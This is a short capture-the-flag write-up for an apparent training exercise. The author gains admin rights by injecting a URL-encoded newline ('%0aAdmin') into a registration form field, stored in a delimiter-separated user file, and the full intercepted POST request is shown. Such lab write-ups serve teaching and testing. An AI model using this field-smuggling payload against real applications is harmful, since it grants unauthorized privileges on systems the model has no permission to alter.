Level 3 | Data Validation; Parameter Delimiter
You are on Level 3. You know that the users are stored on an ordinary text file. You also know that for this to work there are some parameter delimiters used. Your task is to create an account that would be an "admin" using nothing but the provided UI and login with it.
Target:
Tools:
- Firefox
- BurpSuite
Checking the normal behavior of the application.
Register a new account
Success registeration
You'll get forwarded to the created user's page
As you can see our privilges are normal user. If we get back to the discription he said
You know that the users are stored on an ordinary text file. You also know that for this to work there are some parameter delimiters used.
Searching about Data Validation parameter delimiters, I found good topic from OWASP
Tried many delimiters in deferent places and I figured from hints that the newline is the one. Converting the newline to URL encoding will be %0a so I add the user rule after it.
So our request should be like
POST /ctf2/exercises/ex3.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
user=KINGSABRI1&password=123123&lname=LOL%0aAdmin&email=s%40s.com®ister=Register
Now , let's to intercept the registeration request then add our payload to get pass
Observation: What makes me know all the information that have been given in the description should allows me to know that the delimiter is newline.!!